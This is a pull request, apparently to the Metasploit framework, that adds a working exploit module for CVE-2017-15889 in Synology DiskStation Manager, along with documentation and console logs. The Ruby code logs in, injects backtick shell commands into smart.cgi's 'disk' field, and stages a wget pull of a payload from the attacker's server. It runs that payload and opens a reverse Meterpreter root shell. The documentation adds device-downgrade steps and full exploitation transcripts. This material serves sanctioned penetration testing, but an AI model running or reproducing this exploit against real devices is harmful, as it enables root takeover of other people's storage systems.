### PR TITLE
CVE-2017-15889 Synology DSM < 5.2-5967-5 authenticated root exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md
+++ b/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md
@@ -163,4 +163,5 @@ Wfsdelay needs to be at least a couple seconds to allow for payload download and
   smallfixnumber="0"
   builddate="2015/11/12"
   buildtime="17:17:21"
-  meterpreter >  ```
+  meterpreter > 
+  ```

--- a/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md
+++ b/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md
@@ -1,0 +1,166 @@
+## Vulnerable Application
+
+This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
+versions < 5.2-5967-5, which allows the execution of arbitrary commands under root
+privileges after website authentication.
+
+The vulnerability is located in `webman/modules/StorageManager/smart.cgi`, which
+allows appending of a command to the device to be scanned.  However, the command
+with drive is limited to 30 characters.  A somewhat valid drive name is required,
+thus /dev/sd is used, even though it doesn't exist.  To circumvent the character
+restriction, a wget input file is staged in /a, and executed to download our payload
+to /b.  From there the payload is executed.  A wfsdelay is required to give time
+for the payload to download, and the execution of it to run.
+
+A more detailed explination of exploitation steps:
+
+1. We first clean the env by deleting `/a`, and `b`
+2. we use `echo -n` to append our IP:PORT for our staging server to `/a`.  This is
+done in small chunks to stay under the character limit.
+3. we call `wget -i /a -O b` to write our payload to `b` in `/usr/syno/synoman/webman/modules/StorageManager`
+4. we wait for HTTP Server to receive the `wget` request and send back the payload.  Then we execute it.
+
+### Notes
+
+`smart.cgi` and our payload are located in `/usr/syno/synoman/webman/modules/StorageManager`.
+
+`/var/log/messages` will contain logs of exploitation:
+
+```
+May 19 16:35:50 oldNas smart.cgi: smart.cpp:477 smartctl system command failed cmd: /usr/syno/bin/smartctl -d sat -t short /dev/sd`wget -i /a -O b` > /dev/null 2>&1 ret: 4
+May 19 16:35:50 oldNas smart.cgi: smart.cpp:846 error
+```
+
+No randomization was chosen on the `a` and `b` file names since we're so limited on characters as it is.
+While it would be possible to randomize a single character, it didn't seem worth the effort.
+
+### Device Downgrade
+
+The vulnerable DSM can be downloaded from [Synology](https://archive.synology.com/download/DSM/release/5.2/5644/)
+
+Essentially Synology doesn't want you to downgrade. In order to do so, we need to mount the recovery boot loader
+and overwrite it with synology 5.2.  Then when we cause an issue (by removing the disks on boot), it will boot
+to the recovery.  Since the recovery is 5.2, it will let us install the 'current' version of 5.2.
+
+You'll want to watch [Downgrade DSM6.x to DSM 5.2](https://youtube.com/watch?v=DFtOmEv63n4)
+
+The notes from the video are:
+
+1. Turn on synology and backup data if needed.
+2. Create a shared folder. ("test" is used in this guide)
+3. Locally, extract 4 files from DSM 5644.pat (grub_cksum.syno, rd.gz, zImage, checksum.syno)
+and place the files in the newly created shared folder on the NAS.
+4. Enable telnet/ssh in the DSM control panel.
+5. telnet/ssh to the diskstation.
+6. Log in as admin.
+7. Type `sudo su`. The password it asks for will also be the admins password.
+8. Type `cd /dev` to change to the devices directory.
+9. Type `ls synoboot2` to make sure synoboot2 is listed.
+10. Type `mkdir /mnt/synoboot` to make a directory to mount to.
+11. Type `mount synoboot2 /mnt/synoboot` to mount the boot files to the directory we created.
+12. Type `cd /mnt/synoboot` to change to that directory.
+13. Type `ls` to view the files in the directory.
+(note that the names of the 4 files we put in the shared folder, should be there.
+Although these ones listed are the DSM6 versions)
+14. Type `cp /volume1/test/checksum.syno /mnt/synoboot`.
+15. Type `cp /volume1/test/grub_cksum.syno /mnt/synoboot`.
+16. Type `cp /volume1/test/rd.gz /mnt/synoboot`.
+17. Type `cp /volume1/test/zImage /mnt/synoboot`.
+18. Go back into the DSM interface and shutdown. Once the device is shutdown, remove the disks.
+(This step is important because if you do not remove the disks,
+the next powerup will detect an issue and recover the DSM6 boot image)
+19. Power the device up. Should say no disks inserted.
+Before clicking the connect again button, put the hard disks back in and wait for the HDD LED's to light up.
+20. If disks are in, click the connect again button.
+Next page should come up saying to reinstall DSM.
+Make sure to choose the 5967 pat file so that the bootimage is overwritten correctly.
+21. Good to go! Data should remain intact as long as it is in a shared folder,
+and DSM should be a completely stock 5.2 - 5967.
+
+## Verification Steps
+
+  1. Install the 5.2 vulnerable DSM
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/synology_dsm_smart_exec_auth```
+  4. Do: ```set username <username>```
+  5. Do: ```set password <password>```
+  6. Do: ```run```
+  7. You should get a root shell.
+
+## Options
+
+### Password
+
+Password for website login.  Default is `password`.
+
+### Username
+
+Username for website login.  Default is `admin`.
+
+### wfsdelay
+
+Wfsdelay needs to be at least a couple seconds to allow for payload download and staging.  Default is `10`.
+
+## Scenarios
+
+### DS412+ with DSM 5.2-5644
+
+  ```
+  [*] Processing synology.rc for ERB directives.
+  resource (synology.rc)> use modules/exploits/linux/http/synology_dsm_smart_exec_auth
+  resource (synology.rc)> set payload python/meterpreter/reverse_tcp
+  payload => python/meterpreter/reverse_tcp
+  resource (synology.rc)> set rhosts 2.2.2.2
+  rhosts => 2.2.2.2
+  resource (synology.rc)> set lport 60111
+  lport => 60111
+  resource (synology.rc)> set lhost 1.1.1.1
+  lhost => 1.1.1.1
+  resource (synology.rc)> set srvhost 1.1.1.1
+  srvhost => 1.1.1.1
+  resource (synology.rc)> set username admin
+  username => admin
+  resource (synology.rc)> set password password
+  password => password
+  resource (synology.rc)> set verbose true
+  verbose => true
+  resource (synology.rc)> rexploit
+  [*] Reloading module...
+  [*] Started reverse TCP handler on 1.1.1.1:60111 
+  [*] Trying to detect installed version
+  [*] Model DS412+ with version 5.2-5644 detected
+  [*] Attempting Login
+  [*] Using URL: http://1.1.1.1:8080/
+  [*] Cleaning env
+  [*] Staging wget with: echo -n '1.1'>>/a
+  [*] Staging wget with: echo -n '.1.1:'>>/a
+  [*] Staging wget with: echo -n '8080'>>/a
+  [*] Requesting payload pull
+  [+] HTTP Server request received, sending payload
+  [*] Executing payload
+  [*] Sending stage (53755 bytes) to 2.2.2.2
+  [*] Meterpreter session 1 opened (1.1.1.1:60111 -> 2.2.2.2:42353) at 2020-05-19 20:13:33 -0400
+  [*] Server stopped.
+  [!] This exploit may require manual cleanup of '/usr/syno/synoman/webman/modules/StorageManager/b' on the target
+  [!] This exploit may require manual cleanup of '/a' on the target
+
+  meterpreter > 
+  [+] Deleted /usr/syno/synoman/webman/modules/StorageManager/b
+  [+] Deleted /a
+
+  meterpreter > getuid
+  Server username: root
+  meterpreter > sysinfo
+  Computer     : oldNas
+  OS           : Linux 3.10.35 #5644 SMP Thu Nov 12 17:18:22 CST 2015
+  Architecture : x64
+  Meterpreter  : python/linux
+  meterpreter > cat /etc.defaults/VERSION
+  majorversion="5"
+  minorversion="2"
+  buildphase="hotfix"
+  buildnumber="5644"
+  smallfixnumber="0"
+  builddate="2015/11/12"
+  buildtime="17:17:21"
+  meterpreter >  ```

--- a/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md
+++ b/documentation/modules/exploit/linux/http/synology_dsm_smart_exec_auth.md
@@ -165,3 +165,39 @@ Wfsdelay needs to be at least a couple seconds to allow for payload download and
   buildtime="17:17:21"
   meterpreter > 
   ```
+
+### DS410 with DSM 5.2-5644
+
+This unit's version was not able to be determined automatically.  `forceexploit` was set to `true` to enable it to run.
+
+```
+msf5 exploit(linux/http/synology_dsm_smart_exec_auth) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4567 
+[*] Trying to detect installed version
+[*] Attempting Login
+[*] Using URL: http://192.168.135.168:8080/
+[*] Cleaning env
+[*] Staging wget with: echo -n '192.168'>>/a
+[*] Staging wget with: echo -n '.135.16'>>/a
+[*] Staging wget with: echo -n '8:8080'>>/a
+[*] Requesting payload pull
+[+] HTTP Server request received, sending payload
+[*] Executing payload
+[*] Sending stage (53755 bytes) to 192.168.132.107
+[*] Meterpreter session 1 opened (192.168.135.168:4567 -> 192.168.132.107:54951) at 2020-05-20 13:53:18 -0500
+[*] Server stopped.
+[!] This exploit may require manual cleanup of '/usr/syno/synoman/webman/modules/StorageManager/b' on the target
+[!] This exploit may require manual cleanup of '/a' on the target
+
+meterpreter > 
+[+] Deleted /usr/syno/synoman/webman/modules/StorageManager/b
+[+] Deleted /a
+
+meterpreter > sysinfo
+Computer     : DiskStation
+OS           : Linux 2.6.32.12 #5644 Thu Nov 12 17:17:40 CST 2015
+Architecture : ppc
+Meterpreter  : python/linux
+meterpreter > exit
+```

--- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
+++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
@@ -1,0 +1,204 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)
+                        &junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Synology DiskStation Manager smart.cgi Remote Command Execution',
+        'Description' => %q{
+          This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
+          versions 4.x, which allows the execution of arbitrary commands under root
+          privileges.
+          XXX
+          The vulnerability is located in /webman/imageSelector.cgi, which allows to append
+          arbitrary data to a given file using a so called SLICEUPLOAD functionality, which
+          can be triggered by an unauthenticated user with a specially crafted HTTP request.
+          This is exploited by this module to append the given commands to /redirect.cgi,
+          which is a regular shell script file, and can be invoked with another HTTP request.
+          Synology reported that the vulnerability has been fixed with versions 4.0-2259,
+          4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable.
+        },
+        'Author' =>
+          [
+            'Nigusu Kassahun', # Discovery
+            'h00die' # metasploit module
+          ],
+        'References' =>
+          [
+            [ 'CVE', '2017-15889' ],
+            [ 'EDB', '43190' ],
+            [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ],
+            [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
+          ],
+        'Privileged' => true,
+        'Platform' => ['python'],
+        'Arch' => [ARCH_PYTHON],
+        'Targets' =>
+          [
+            ['Automatic', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PrependMigrate' => true,
+          'WfsDelay'=> 10
+        },
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => 'Nov 08 2017'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(5000),
+        OptString.new('TARGETURI', [ true, 'The URI of the Synology Website', '/']),
+        OptString.new('USERNAME', [ true, 'The Username for Synology', 'admin']),
+        OptString.new('PASSWORD', [ true, 'The Password for Synology', ''])
+      ]
+    )
+  end
+
+  def setup
+    super
+  end
+
+  def check
+    vprint_status('Trying to detect installed version')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'webman', 'info.cgi'),
+      'vars_get' => { 'host' => '' }
+    })
+
+    if res && (res.code == 200) && res.body =~ DEVICE_INFO_PATTERN
+      version = "#{$LAST_MATCH_INFO[:major]}.#{$LAST_MATCH_INFO[:minor]}"
+      build = $LAST_MATCH_INFO[:build]
+      model = $LAST_MATCH_INFO[:model].sub(/^[a-z]+/) { |s| s[0].upcase }
+      model = "DS#{model}" unless model =~ /^[A-Z]/
+    else
+      vprint_error('Detection failed')
+      return CheckCode::Unknown
+    end
+
+    vprint_status("Model #{model} with version #{version}-#{build} detected")
+
+    case version
+    when '3.0', '4.0', '4.1', '4.2', '4.3', '5.0', '5.1'
+      return CheckCode::Appears
+    when '5.2'
+      return CheckCode::Appears if build < '5967-5'
+    end
+
+    CheckCode::Safe
+  end
+
+  def on_request_uri(cli, request, cookie, token)
+    print_good('HTTP Server request received, sending payload')
+    send_response(cli, payload.encoded)
+    print_status('Executing payload')
+    #inject_request(cookie, token, cmd="chmod +x /b;/b")
+    inject_request(cookie, token, cmd='python b>/c&')
+  end
+
+  def inject_request(cookie, token, cmd='')
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'webman', 'modules', 'StorageManager', 'smart.cgi'),
+      # 'ctype'   => "application/x-www-form-urlencoded",
+      'cookie' => cookie,
+      'headers' => {
+        'X-SYNO-TOKEN' => token
+      },
+      'vars_post' => {
+        'action' => 'apply',
+        'operation' => 'quick',
+        #'disk' => "/dev/sda`#{payload.encoded}`"
+        'disk' => "/dev/sda`#{cmd}`"
+      }
+    })
+  end
+
+  def login
+    # If you try to debug login through the browser, you'll see that desktop.js calls
+    # ux-all.js to do an RSA encrypted login.
+    # Wowever in a stroke of luck Mrs. h00die caused
+    # a power sag while tracing/debugging the loging, causing the NAS to power off.
+    # when that happened, it failed to get the crypto vars, and defaulted to a
+    # non-encrypted login, which seems to work just fine.  greetz Mrs. h00die!
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'webman', 'login.cgi'),
+      'vars_get' => { 'enable_syno_token' => 'yes' },
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'passwd' => datastore['PASSWORD'],
+        'OTPcode' => '',
+        '__cIpHeRtExT' => '',
+        'client_time' => Time.now.to_i,
+        'isIframeLogin' => 'yes'
+      }
+    })
+    if res && %r{<div id='synology'>(?<json>.*)</div>}m =~ res.body
+      result = JSON.parse(json)
+
+      fail_with(Failure::BadConfig, 'Incorrect Username/Password') if result['result'] == 'error'
+      if result['result'] == 'success'
+        return res.get_cookies, result['SynoToken']
+      end
+
+      fail_with(Failure::Unknown, "Unknown response: #{result}")
+    end
+  end
+
+  def exploit
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
+    end
+
+    begin
+      print_status('Attempting Login')
+      cookie, token = login
+
+      start_service({ 'Uri' => {
+        'Proc' => proc do |cli, req|
+          on_request_uri(cli, req, cookie, token)
+        end,
+        'Path' => '/'
+      } })
+
+
+      print_status('Cleaning env')
+      inject_request(cookie, token, cmd='rm -rf /a')
+      inject_request(cookie, token, cmd='rm -rf /b')
+      command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
+      command_space = 22 - "echo -n ''>>/a".length
+      command_space = command_space - 1
+      command.each_slice(command_space) do |a|
+        a = a.join('')
+        vprint_status("Staging wget with: echo -n '#{a}'>>/a")
+        inject_request(cookie, token, cmd="echo -n '#{a}'>>/a")
+      end
+
+      print_status('Requesting payload pull')
+      inject_request(cookie, token, cmd='wget -i /a -O b')
+      # at this point we let the HTTP server call the last stage
+      # wfsdelay should be long enough to hold out for everything to download and run
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+
+  end
+end

--- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
+++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FileDropper
 
   DEVICE_INFO_PATTERN = /major=(?<major>\d+)&minor=(?<minor>\d+)&build=(?<build>\d+)
                         &junior=\d+&unique=synology_\w+_(?<model>[^&]+)/x.freeze
@@ -19,16 +20,15 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Synology DiskStation Manager smart.cgi Remote Command Execution',
         'Description' => %q{
           This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
-          versions 4.x, which allows the execution of arbitrary commands under root
-          privileges.
-          XXX
-          The vulnerability is located in /webman/imageSelector.cgi, which allows to append
-          arbitrary data to a given file using a so called SLICEUPLOAD functionality, which
-          can be triggered by an unauthenticated user with a specially crafted HTTP request.
-          This is exploited by this module to append the given commands to /redirect.cgi,
-          which is a regular shell script file, and can be invoked with another HTTP request.
-          Synology reported that the vulnerability has been fixed with versions 4.0-2259,
-          4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable.
+          versions < 5.2-5967-5, which allows the execution of arbitrary commands under root
+          privileges after website authentication.
+          The vulnerability is located in webman/modules/StorageManager/smart.cgi, which
+          allows appending of a command to the device to be scanned.  However, the command
+          with drive is limited to 30 characters.  A somewhat valid drive name is required,
+          thus /dev/sd is used, even though it doesn't exist.  To circumvent the character
+          restriction, a wget input file is staged in /a, and executed to download our payload
+          to /b.  From there the payload is executed.  A wfsdelay is required to give time
+          for the payload to download, and the execution of it to run.
         },
         'Author' =>
           [
@@ -43,6 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
             [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
           ],
         'Privileged' => true,
+        'Stance' => Msf::Exploit::Stance::Aggressive,
         'Platform' => ['python'],
         'Arch' => [ARCH_PYTHON],
         'Targets' =>
@@ -52,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'DefaultOptions' => {
           'PrependMigrate' => true,
-          'WfsDelay'=> 10
+          'WfsDelay' => 10
         },
         'License' => MSF_LICENSE,
         'DisclosureDate' => 'Nov 08 2017'
@@ -100,19 +101,17 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Safe
   end
 
-  def on_request_uri(cli, request, cookie, token)
+  def on_request_uri(cli, _request, cookie, token)
     print_good('HTTP Server request received, sending payload')
     send_response(cli, payload.encoded)
     print_status('Executing payload')
-    #inject_request(cookie, token, cmd="chmod +x /b;/b")
-    inject_request(cookie, token, cmd='python b>/c&')
+    inject_request(cookie, token, 'python b')
   end
 
-  def inject_request(cookie, token, cmd='')
+  def inject_request(cookie, token, cmd = '')
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'webman', 'modules', 'StorageManager', 'smart.cgi'),
-      # 'ctype'   => "application/x-www-form-urlencoded",
       'cookie' => cookie,
       'headers' => {
         'X-SYNO-TOKEN' => token
@@ -120,8 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => {
         'action' => 'apply',
         'operation' => 'quick',
-        #'disk' => "/dev/sda`#{payload.encoded}`"
-        'disk' => "/dev/sda`#{cmd}`"
+        'disk' => "/dev/sd`#{cmd}`"
       }
     })
   end
@@ -164,6 +162,10 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
     end
 
+    if datastore['SRVHOST'] == '0.0.0.0'
+      fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
+    end
+
     begin
       print_status('Attempting Login')
       cookie, token = login
@@ -175,21 +177,21 @@ class MetasploitModule < Msf::Exploit::Remote
         'Path' => '/'
       } })
 
-
       print_status('Cleaning env')
-      inject_request(cookie, token, cmd='rm -rf /a')
-      inject_request(cookie, token, cmd='rm -rf /b')
+      inject_request(cookie, token, cmd = 'rm -rf /a')
+      inject_request(cookie, token, cmd = 'rm -rf b')
       command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
       command_space = 22 - "echo -n ''>>/a".length
-      command_space = command_space - 1
+      command_space -= 1
       command.each_slice(command_space) do |a|
         a = a.join('')
         vprint_status("Staging wget with: echo -n '#{a}'>>/a")
-        inject_request(cookie, token, cmd="echo -n '#{a}'>>/a")
+        inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a")
       end
-
       print_status('Requesting payload pull')
-      inject_request(cookie, token, cmd='wget -i /a -O b')
+      register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b')
+      register_file_for_cleanup('/a')
+      inject_request(cookie, token, cmd = 'wget -i /a -O b')
       # at this point we let the HTTP server call the last stage
       # wfsdelay should be long enough to hold out for everything to download and run
     rescue ::Rex::ConnectionError

--- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
+++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
@@ -69,10 +69,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def setup
-    super
-  end
-
   def check
     vprint_status('Trying to detect installed version')
 

--- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
+++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
@@ -63,11 +63,15 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(5000),
-        OptString.new('TARGETURI', [ true, 'The URI of the Synology Website', '/']),
-        OptString.new('USERNAME', [ true, 'The Username for Synology', 'admin']),
-        OptString.new('PASSWORD', [ true, 'The Password for Synology', ''])
+        OptString.new('TARGETURI', [true, 'The URI of the Synology Website', '/']),
+        OptString.new('USERNAME', [true, 'The Username for Synology', 'admin']),
+        OptString.new('PASSWORD', [true, 'The Password for Synology', ''])
       ]
     )
+
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ]
   end
 
   def check
@@ -158,8 +162,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    if check != CheckCode::Appears
-      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
+    unless check == CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
     end
 
     if datastore['SRVHOST'] == '0.0.0.0'


### PR DESCRIPTION
Exploits an authenticated root RCE within Synology DSM < 5.2-5967-5.

Please read the docs on how to downgrade a device to make it vuln, it isn't intuitive.

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/linux/http/synology_dsm_smart_exec_auth`
- [x] set rhosts/lhosts/payloads/username/password
- [x] **Verify** you get a root shell
- [x] **Document** looks correct on spelling and grammmmmmmmmmmerer

  ```
  [*] Processing synology.rc for ERB directives.
  resource (synology.rc)> use modules/exploits/linux/http/synology_dsm_smart_exec_auth
  resource (synology.rc)> set payload python/meterpreter/reverse_tcp
  payload => python/meterpreter/reverse_tcp
  resource (synology.rc)> set rhosts 2.2.2.2
  rhosts => 2.2.2.2
  resource (synology.rc)> set lport 60111
  lport => 60111
  resource (synology.rc)> set lhost 1.1.1.1
  lhost => 1.1.1.1
  resource (synology.rc)> set srvhost 1.1.1.1
  srvhost => 1.1.1.1
  resource (synology.rc)> set username admin
  username => admin
  resource (synology.rc)> set password password
  password => password
  resource (synology.rc)> set verbose true
  verbose => true
  resource (synology.rc)> rexploit
  [*] Reloading module...
  [*] Started reverse TCP handler on 1.1.1.1:60111
  [*] Trying to detect installed version
  [*] Model DS412+ with version 5.2-5644 detected
  [*] Attempting Login
  [*] Using URL: http://1.1.1.1:8080/
  [*] Cleaning env
  [*] Staging wget with: echo -n '1.1'>>/a
  [*] Staging wget with: echo -n '.1.1:'>>/a
  [*] Staging wget with: echo -n '8080'>>/a
  [*] Requesting payload pull
  [+] HTTP Server request received, sending payload
  [*] Executing payload
  [*] Sending stage (53755 bytes) to 2.2.2.2
  [*] Meterpreter session 1 opened (1.1.1.1:60111 -> 2.2.2.2:42353) at 2020-05-19 20:13:33 -0400
  [*] Server stopped.
  [!] This exploit may require manual cleanup of '/usr/syno/synoman/webman/modules/StorageManager/b' on the target
  [!] This exploit may require manual cleanup of '/a' on the target

  meterpreter >
  [+] Deleted /usr/syno/synoman/webman/modules/StorageManager/b
  [+] Deleted /a

  meterpreter > getuid
  Server username: root
  meterpreter > sysinfo
  Computer     : oldNas
  OS           : Linux 3.10.35 #5644 SMP Thu Nov 12 17:18:22 CST 2015
  Architecture : x64
  Meterpreter  : python/linux
  meterpreter > cat /etc.defaults/VERSION
  majorversion="5"
  minorversion="2"
  buildphase="hotfix"
  buildnumber="5644"
  smallfixnumber="0"
  builddate="2015/11/12"
  buildtime="17:17:21"
  meterpreter > 
  ```